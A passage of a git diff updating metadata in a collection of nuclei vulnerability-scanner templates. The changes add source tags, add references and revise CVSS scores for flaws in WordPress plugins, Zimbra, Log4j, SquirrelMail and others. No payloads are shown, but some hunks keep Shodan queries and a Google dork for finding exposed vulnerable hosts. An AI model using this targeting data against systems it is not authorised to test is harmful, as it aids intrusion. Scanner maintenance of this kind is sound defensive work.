b/config/nuclei-templates/vulnerabilities/other/yeswiki-stored-xss.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true shodan-query: http.html:"yeswiki" - tags: yeswiki,xss,stored + tags: yeswiki,xss,stored,huntr requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/other/yeswiki-xss.yaml b/config/nuclei-templates/vulnerabilities/other/yeswiki-xss.yaml index 3e7df1356..fe367a7cb 100644 --- a/config/nuclei-templates/vulnerabilities/other/yeswiki-xss.yaml +++ b/config/nuclei-templates/vulnerabilities/other/yeswiki-xss.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true shodan-query: http.html:"yeswiki" - tags: cve,cve2022,xss,yeswiki,unauth + tags: yeswiki,unauth,huntr,cve,cve2022,xss requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/other/yishaadmin-lfi.yaml b/config/nuclei-templates/vulnerabilities/other/yishaadmin-lfi.yaml index 309317c0f..13bfe758b 100644 --- a/config/nuclei-templates/vulnerabilities/other/yishaadmin-lfi.yaml +++ b/config/nuclei-templates/vulnerabilities/other/yishaadmin-lfi.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: lfi,yishaadmin + tags: lfi,yishaadmin,huntr requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/other/zimbra-preauth-ssrf.yaml b/config/nuclei-templates/vulnerabilities/other/zimbra-preauth-ssrf.yaml index dc4e8a02a..6beb74e79 100644 --- a/config/nuclei-templates/vulnerabilities/other/zimbra-preauth-ssrf.yaml +++ b/config/nuclei-templates/vulnerabilities/other/zimbra-preauth-ssrf.yaml @@ -3,14 +3,15 @@ id: zimbra-preauth-ssrf info: name: Zimbra Collaboration Suite - Server-Side Request Forgery author: gy741 - severity: medium + severity: critical description: Zimbra Collaboration Suite (ZCS) allows remote unauthenticated attackers to cause the product to include content returned by third-party servers and use it as its own code. reference: - https://www.adminxe.com/2183.html - https://nvd.nist.gov/vuln/detail/CVE-2020-7796 + - https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P7 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 6.8 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2020-7796 cwe-id: CWE-918 tags: zimbra,ssrf,oast diff --git a/config/nuclei-templates/vulnerabilities/other/zms-auth-bypass.yaml b/config/nuclei-templates/vulnerabilities/other/zms-auth-bypass.yaml index 86b727fd1..15b5b8aa2 100644 --- a/config/nuclei-templates/vulnerabilities/other/zms-auth-bypass.yaml +++ b/config/nuclei-templates/vulnerabilities/other/zms-auth-bypass.yaml @@ -7,7 +7,7 @@ info: description: A vulnerability in Zoo Management allows remote attackers to bypass the authentication mechanism via an SQL injection vulnerability. reference: - https://www.exploit-db.com/exploits/48880 - tags: auth-bypass,zms + tags: zms,edb,auth-bypass requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/other/zms-sqli.yaml b/config/nuclei-templates/vulnerabilities/other/zms-sqli.yaml index 178a7b50e..43aed3d58 100644 --- a/config/nuclei-templates/vulnerabilities/other/zms-sqli.yaml +++ b/config/nuclei-templates/vulnerabilities/other/zms-sqli.yaml @@ -10,7 +10,7 @@ info: - https://www.exploit-db.com/exploits/48880 metadata: verified: true - tags: zms,sqli,auth-bypass,cms + tags: zms,sqli,auth-bypass,cms,edb requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/rails/rails6-xss.yaml b/config/nuclei-templates/vulnerabilities/rails/rails6-xss.yaml index 6bc1c7b91..b82d75b3a 100644 --- a/config/nuclei-templates/vulnerabilities/rails/rails6-xss.yaml +++ b/config/nuclei-templates/vulnerabilities/rails/rails6-xss.yaml @@ -12,7 +12,7 @@ info: severity: medium reference: - https://hackerone.com/reports/904059 - tags: rails,xss,crlf + tags: rails,xss,crlf,hackerone requests: - method: POST diff --git a/config/nuclei-templates/vulnerabilities/royalevent/royalevent-stored-xss.yaml b/config/nuclei-templates/vulnerabilities/royalevent/royalevent-stored-xss.yaml index 601e0fc7a..cbde243a6 100644 --- a/config/nuclei-templates/vulnerabilities/royalevent/royalevent-stored-xss.yaml +++ b/config/nuclei-templates/vulnerabilities/royalevent/royalevent-stored-xss.yaml @@ -11,7 +11,7 @@ info: - https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip metadata: verified: true - tags: xss,unauthenticated,cms,royalevent + tags: xss,unauthenticated,cms,royalevent,packetstorm requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/ruijie/ruijie-networks-lfi.yaml b/config/nuclei-templates/vulnerabilities/ruijie/ruijie-networks-lfi.yaml index d60116712..d5ff6505d 100644 --- a/config/nuclei-templates/vulnerabilities/ruijie/ruijie-networks-lfi.yaml +++ b/config/nuclei-templates/vulnerabilities/ruijie/ruijie-networks-lfi.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: ruijie,lfi + tags: ruijie,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/samsung/samsung-wlan-ap-xss.yaml b/config/nuclei-templates/vulnerabilities/samsung/samsung-wlan-ap-xss.yaml index 05a6201a3..c0f37838e 100644 --- a/config/nuclei-templates/vulnerabilities/samsung/samsung-wlan-ap-xss.yaml +++ b/config/nuclei-templates/vulnerabilities/samsung/samsung-wlan-ap-xss.yaml @@ -6,7 +6,7 @@ info: severity: medium reference: - https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/ - tags: xss,samsung,xss + tags: xss,samsung requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml b/config/nuclei-templates/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml index 169542633..e77186f32 100644 --- a/config/nuclei-templates/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml +++ b/config/nuclei-templates/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 cwe-id: CWE-89 - tags: sqli,simplecrm,auth-bypass,injection + tags: packetstorm,sqli,simplecrm,auth-bypass,injection requests: - method: POST diff --git a/config/nuclei-templates/vulnerabilities/springboot/springboot-log4j-rce.yaml b/config/nuclei-templates/vulnerabilities/springboot/springboot-log4j-rce.yaml index 90b53c066..5936bb177 100644 --- a/config/nuclei-templates/vulnerabilities/springboot/springboot-log4j-rce.yaml +++ b/config/nuclei-templates/vulnerabilities/springboot/springboot-log4j-rce.yaml @@ -9,15 +9,14 @@ info: - https://logging.apache.org/log4j/2.x/security.html - https://www.lunasec.io/docs/blog/log4j-zero-day/ - /~https://github.com/twseptian/Spring-Boot-Log4j-CVE-2021-44228-Docker-Lab - - https://logging.apache.org/log4j/2.x/security.html - https://nvd.nist.gov/vuln/detail/CVE-2021-44228 + remediation: Upgrade to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later). classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cve-id: CVE-2021-44228 cwe-id: CWE-502 - remediation: Upgrade to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later). - tags: cve,cve2021,springboot,rce,oast,log4j + tags: cve,cve2021,springboot,rce,oast,log4j,kev requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/squirrelmail/squirrelmail-add-xss.yaml b/config/nuclei-templates/vulnerabilities/squirrelmail/squirrelmail-add-xss.yaml index e54ece65b..d62c8be3e 100644 --- a/config/nuclei-templates/vulnerabilities/squirrelmail/squirrelmail-add-xss.yaml +++ b/config/nuclei-templates/vulnerabilities/squirrelmail/squirrelmail-add-xss.yaml @@ -7,7 +7,7 @@ info: description: SquirrelMail Address Add Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. reference: - https://www.exploit-db.com/exploits/26305 - tags: xss,squirrelmail,plugin + tags: edb,xss,squirrelmail,plugin requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/squirrelmail/squirrelmail-lfi.yaml b/config/nuclei-templates/vulnerabilities/squirrelmail/squirrelmail-lfi.yaml index dd4fb7060..ad9f4b667 100644 --- a/config/nuclei-templates/vulnerabilities/squirrelmail/squirrelmail-lfi.yaml +++ b/config/nuclei-templates/vulnerabilities/squirrelmail/squirrelmail-lfi.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: lfi,squirrelmail + tags: lfi,squirrelmail,edb requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/squirrelmail/squirrelmail-vkeyboard-xss.yaml b/config/nuclei-templates/vulnerabilities/squirrelmail/squirrelmail-vkeyboard-xss.yaml index dddf453c8..8a3578b3e 100644 --- a/config/nuclei-templates/vulnerabilities/squirrelmail/squirrelmail-vkeyboard-xss.yaml +++ b/config/nuclei-templates/vulnerabilities/squirrelmail/squirrelmail-vkeyboard-xss.yaml @@ -7,7 +7,7 @@ info: description: The Virtual Keyboard plugin for SquirrelMail is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. reference: - https://www.exploit-db.com/exploits/34814 - tags: xss,squirrelmail,plugin + tags: xss,squirrelmail,plugin,edb requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml b/config/nuclei-templates/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml index e1fd12a08..4fd517fcb 100644 --- a/config/nuclei-templates/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml +++ b/config/nuclei-templates/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml @@ -7,7 +7,7 @@ info: description: ThinkPHP 5.0.9 includes verbose SQL error message that can reveal sensitive information including database credentials. reference: - /~https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/in-sqlinjection - tags: thinkphp + tags: thinkphp,vulhub requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/404-to-301-xss.yaml b/config/nuclei-templates/vulnerabilities/wordpress/404-to-301-xss.yaml index 5c1e9c3f1..ac8bf48c5 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/404-to-301-xss.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/404-to-301-xss.yaml @@ -8,7 +8,7 @@ info: reference: - https://wpscan.com/vulnerability/4a310b4f-79fa-4b74-93f8-e4522921abe1 - https://wordpress.org/plugins/404-to-301 - tags: wp-plugin,xss,wp,wordpress,authenticated + tags: wpscan,wp-plugin,xss,wp,wordpress,authenticated requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/wordpress/CVE-2019-10692.yaml b/config/nuclei-templates/vulnerabilities/wordpress/CVE-2019-10692.yaml index 447a19c3a..bf7ac7dbd 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/CVE-2019-10692.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/CVE-2019-10692.yaml @@ -1,20 +1,26 @@ id: CVE-2019-10692 -info: - name: WP Google Maps < 7.11.18 - Unauthenticated SQL Injection - author: pussycat0x - severity: critical - description: | - In the wp-google-maps plugin before 7.11.18 for WordPress, - includes/class.rest-api.php in the REST API does not sanitize field names - before a SELECT statement. - reference: - - https://wpscan.com/vulnerability/475404ce-2a1a-4d15-bf02-df0ea2afdaea - - https://nvd.nist.gov/vuln/detail/CVE-2019-10692 - metadata: - verified: true - tags: cve,cve2019,sqli,wp,wordpress,wp-plugin,unauth,googlemaps - +info: + name: WP Google Maps < 7.11.18 - Unauthenticated SQL Injection + author: pussycat0x + severity: critical + description: | + In the wp-google-maps plugin before 7.11.18 for WordPress, + includes/class.rest-api.php in the REST API does not sanitize field names + before a SELECT statement. + reference: + - https://wpscan.com/vulnerability/475404ce-2a1a-4d15-bf02-df0ea2afdaea + - https://nvd.nist.gov/vuln/detail/CVE-2019-10692 + - https://wordpress.org/plugins/wp-google-maps/#developers + - https://plugins.trac.wordpress.org/changeset?old_path=%2Fwp-google-maps&old=2061433&new_path=%2Fwp-google-maps&new=2061434&sfp_email=&sfph_mail=#file755 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2019-10692 + cwe-id: CWE-89 + metadata: + verified: "true" + tags: cve,cve2019,wp,wp-plugin,unauth,sqli,wordpress,googlemaps,wpscan requests: - method: GET path: diff --git a/config/nuclei-templates/vulnerabilities/wordpress/ad-widget-lfi.yaml b/config/nuclei-templates/vulnerabilities/wordpress/ad-widget-lfi.yaml index 67af14b14..d5b2f5133 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/ad-widget-lfi.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/ad-widget-lfi.yaml @@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: wordpress,wp-plugin,lfi,wp,adWidget + tags: wordpress,wp-plugin,lfi,wp,adWidget,wpscan requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/advanced-access-manager-lfi.yaml b/config/nuclei-templates/vulnerabilities/wordpress/advanced-access-manager-lfi.yaml index 32dd1008e..22f5356ed 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/advanced-access-manager-lfi.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/advanced-access-manager-lfi.yaml @@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: wordpress,wp-plugin,lfi,wp,accessmanager + tags: wordpress,wp-plugin,lfi,wp,accessmanager,wpscan requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/age-gate-open-redirect.yaml b/config/nuclei-templates/vulnerabilities/wordpress/age-gate-open-redirect.yaml index ec5e7a5cb..e2da295be 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/age-gate-open-redirect.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/age-gate-open-redirect.yaml @@ -11,7 +11,7 @@ info: - https://wordpress.org/plugins/age-gate metadata: verified: true - tags: wp-plugin,redirect,wordpress,wp,agegate,unauth + tags: agegate,unauth,wpscan,packetstorm,wp-plugin,redirect,wordpress,wp requests: - method: POST diff --git a/config/nuclei-templates/vulnerabilities/wordpress/ait-csv-import-export-rce.yaml b/config/nuclei-templates/vulnerabilities/wordpress/ait-csv-import-export-rce.yaml index 00facc835..cc61ba9fd 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/ait-csv-import-export-rce.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/ait-csv-import-export-rce.yaml @@ -13,7 +13,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 9.8 cwe-id: CWE-434 - tags: wordpress,wp-plugin,rce,upload,unauth,ait-csv,wp + tags: wp-plugin,rce,upload,unauth,wpscan,msf,wordpress,ait-csv,wp requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/wordpress/amministrazione-aperta-lfi.yaml b/config/nuclei-templates/vulnerabilities/wordpress/amministrazione-aperta-lfi.yaml index 53699b552..9203c6cd0 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/amministrazione-aperta-lfi.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/amministrazione-aperta-lfi.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: wordpress,wp-plugin,lfi,wp + tags: wp-plugin,lfi,wp,edb,wordpress requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/analytify-plugin-xss.yaml b/config/nuclei-templates/vulnerabilities/wordpress/analytify-plugin-xss.yaml index 76c9c77af..f7b32e963 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/analytify-plugin-xss.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/analytify-plugin-xss.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true google-dork: inurl:/wp-content/plugins/wp-analytify - tags: wp-plugin,xss,wp,wordpress,analytify + tags: wp,wordpress,analytify,wpscan,wp-plugin,xss requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/aspose-file-download.yaml b/config/nuclei-templates/vulnerabilities/wordpress/aspose-file-download.yaml index 327b07bcc..dfc4df301 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/aspose-file-download.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/aspose-file-download.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: wordpress,wp-plugin,lfi,aspose,ebook + tags: aspose,ebook,wpscan,wordpress,wp-plugin,lfi requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/aspose-ie-file-download.yaml b/config/nuclei-templates/vulnerabilities/wordpress/aspose-ie-file-download.yaml index 18857d618..f87fe938e 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/aspose-ie-file-download.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/aspose-ie-file-download.yaml @@ -8,7 +8,7 @@ info: reference: - https://packetstormsecurity.com/files/131162/ - https://wordpress.org/plugins/aspose-importer-exporter - tags: wordpress,wp-plugin,lfi,aspose + tags: aspose,packetstorm,wordpress,wp-plugin,lfi requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/aspose-pdf-file-download.yaml b/config/nuclei-templates/vulnerabilities/wordpress/aspose-pdf-file-download.yaml index d10395f6c..6b86fb889 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/aspose-pdf-file-download.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/aspose-pdf-file-download.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: wordpress,wp-plugin,lfi,aspose + tags: aspose,packetstorm,wordpress,wp-plugin,lfi requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/aspose-words-file-download.yaml b/config/nuclei-templates/vulnerabilities/wordpress/aspose-words-file-download.yaml index 78a79b554..25a3c5920 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/aspose-words-file-download.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/aspose-words-file-download.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: wordpress,wp-plugin,lfi,aspose + tags: wordpress,wp-plugin,lfi,aspose,wpscan requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/avchat-video-chat-xss.yaml b/config/nuclei-templates/vulnerabilities/wordpress/avchat-video-chat-xss.yaml index 6c32b6223..1b7c168aa 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/avchat-video-chat-xss.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/avchat-video-chat-xss.yaml @@ -11,7 +11,7 @@ info: - https://wpscan.com/vulnerability/fce99c82-3958-4c17-88d3-6e8fa1a11e59 metadata: verified: true - tags: wordpress,wp-plugin,xss,,wp + tags: xss,,wp,wpscan,wordpress,wp-plugin requests: diff --git a/config/nuclei-templates/vulnerabilities/wordpress/brandfolder-lfi.yaml b/config/nuclei-templates/vulnerabilities/wordpress/brandfolder-lfi.yaml index 1a5a150cc..651afaf02 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/brandfolder-lfi.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/brandfolder-lfi.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: wordpress,wp-plugin,lfi,rfi + tags: lfi,rfi,edb,wordpress,wp-plugin requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/brandfolder-open-redirect.yaml b/config/nuclei-templates/vulnerabilities/wordpress/brandfolder-open-redirect.yaml index 9f9310de6..6dbc65b78 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/brandfolder-open-redirect.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/brandfolder-open-redirect.yaml @@ -9,7 +9,7 @@ info: reference: - https://www.exploit-db.com/exploits/39591 - https://wpscan.com/vulnerability/f850e182-f9c6-4264-b2b1-e587447fe4b1 - tags: wordpress,wp-plugin,lfi,rfi,redirect,wp,brandfolder + tags: wp,brandfolder,edb,wpscan,wp-plugin,redirect,rfi,wordpress,lfi requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/calameo-publications-xss.yaml b/config/nuclei-templates/vulnerabilities/wordpress/calameo-publications-xss.yaml index c48158ddf..8b7e414d1 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/calameo-publications-xss.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/calameo-publications-xss.yaml @@ -12,7 +12,7 @@ info: - https://wordpress.org/plugins/athlon-manage-calameo-publications/ metadata: verified: true - tags: wordpress,wp-plugin,xss,wp + tags: wordpress,wp-plugin,xss,wp,wpscan requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/checkout-fields-manager-xss.yaml b/config/nuclei-templates/vulnerabilities/wordpress/checkout-fields-manager-xss.yaml index 45b8bc25e..ee85ae435 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/checkout-fields-manager-xss.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/checkout-fields-manager-xss.yaml @@ -10,7 +10,7 @@ info: - https://wordpress.org/plugins/woocommerce-checkout-manager metadata: verified: true - tags: wp-plugin,xss,wp,wordpress,authenticated,woocommerce + tags: xss,wp,wordpress,authenticated,woocommerce,wpscan,wp-plugin requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/wordpress/cherry-file-download.yaml b/config/nuclei-templates/vulnerabilities/wordpress/cherry-file-download.yaml index 8ebd3cd3c..665eda9be 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/cherry-file-download.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/cherry-file-download.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-22 - tags: wordpress,wp-plugin,lfi + tags: wordpress,wp-plugin,lfi,wpscan requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/cherry-lfi.yaml b/config/nuclei-templates/vulnerabilities/wordpress/cherry-lfi.yaml index b0b6c0a44..12b2f06f0 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/cherry-lfi.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/cherry-lfi.yaml @@ -13,7 +13,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-22 - tags: wordpress,wp-plugin,lfi,wp + tags: wpscan,wordpress,wp-plugin,lfi,wp requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/church-admin-lfi.yaml b/config/nuclei-templates/vulnerabilities/wordpress/church-admin-lfi.yaml index 4de824478..0817d5972 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/church-admin-lfi.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/church-admin-lfi.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: wordpress,wp-plugin,lfi + tags: wordpress,wp-plugin,lfi,wpscan requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/churchope-lfi.yaml b/config/nuclei-templates/vulnerabilities/wordpress/churchope-lfi.yaml index a0f1465b8..9ad46eccf 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/churchope-lfi.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/churchope-lfi.yaml @@ -9,7 +9,7 @@ info: - https://wpscan.com/vulnerability/3c5833bd-1fe0-4eba-97aa-7d3a0c8fda15 classification: cwe-id: CWE-22 - tags: wordpress,wp-theme,lfi,wp + tags: wp,wpscan,wordpress,wp-theme,lfi requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/clearfy-cache-xss.yaml b/config/nuclei-templates/vulnerabilities/wordpress/clearfy-cache-xss.yaml index 1a3b244a8..35ea283d0 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/clearfy-cache-xss.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/clearfy-cache-xss.yaml @@ -8,7 +8,7 @@ info: reference: - https://wpscan.com/vulnerability/a59e7102-13d6-4f1e-b7b1-75eae307e516 - https://wordpress.org/plugins/clearfy - tags: wp-plugin,xss,wp,wordpress,authenticated,clearfy-cache + tags: xss,wp,wordpress,authenticated,clearfy-cache,wpscan,wp-plugin requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/wordpress/curcy-xss.yaml b/config/nuclei-templates/vulnerabilities/wordpress/curcy-xss.yaml index bad774e72..bf890fbf7 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/curcy-xss.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/curcy-xss.yaml @@ -10,7 +10,7 @@ info: - https://wordpress.org/plugins/woo-multi-currency metadata: verified: true - tags: wp-plugin,xss,wp,wordpress,authenticated,curcy + tags: wp-plugin,xss,wp,wordpress,authenticated,curcy,wpscan requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/wordpress/diarise-theme-lfi.yaml b/config/nuclei-templates/vulnerabilities/wordpress/diarise-theme-lfi.yaml index 366df9bb9..c40168260 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/diarise-theme-lfi.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/diarise-theme-lfi.yaml @@ -11,7 +11,7 @@ info: - https://woocommerce.com/?aff=1790 classification: cwe-id: CWE-98 - tags: wordpress,wp-theme,lfi + tags: packetstorm,wordpress,wp-theme,lfi requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/elex-woocommerce-xss.yaml b/config/nuclei-templates/vulnerabilities/wordpress/elex-woocommerce-xss.yaml index 0a91138df..3503e7b27 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/elex-woocommerce-xss.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/elex-woocommerce-xss.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 - tags: wordpress,wp-plugin,xss,authenticated,woocommerce + tags: wp-plugin,xss,authenticated,woocommerce,wpscan,wordpress requests: - raw: diff --git a/config/nuclei-templates/vulnerabilities/wordpress/flow-flow-social-stream-xss.yaml b/config/nuclei-templates/vulnerabilities/wordpress/flow-flow-social-stream-xss.yaml index af1015d33..c3e91edbe 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/flow-flow-social-stream-xss.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/flow-flow-social-stream-xss.yaml @@ -6,7 +6,7 @@ info: severity: medium reference: - https://wpscan.com/vulnerability/8354b34e-40f4-4b70-bb09-38e2cf572ce9 - tags: xss,wordpress + tags: xss,wordpress,wpscan requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/hb-audio-lfi.yaml b/config/nuclei-templates/vulnerabilities/wordpress/hb-audio-lfi.yaml index f08ce7232..cac0c6010 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/hb-audio-lfi.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/hb-audio-lfi.yaml @@ -13,7 +13,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: wordpress,wp-plugin,lfi,wp + tags: wp,packetstorm,wordpress,wp-plugin,lfi requests: - method: GET diff --git a/config/nuclei-templates/vulnerabilities/wordpress/health-check-lfi.yaml b/config/nuclei-templates/vulnerabilities/wordpress/health-check-lfi.yaml index 93204f223..3f766e234 100644 --- a/config/nuclei-templates/vulnerabilities/wordpress/health-check-lfi.yaml +++ b/config/nuclei-templates/vulnerabilities/wordpress/health-check-lfi.yaml @@ -13,7 +13,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: lfi,wp,wordpress,wp-plugin,authenticated,lfr + tags: 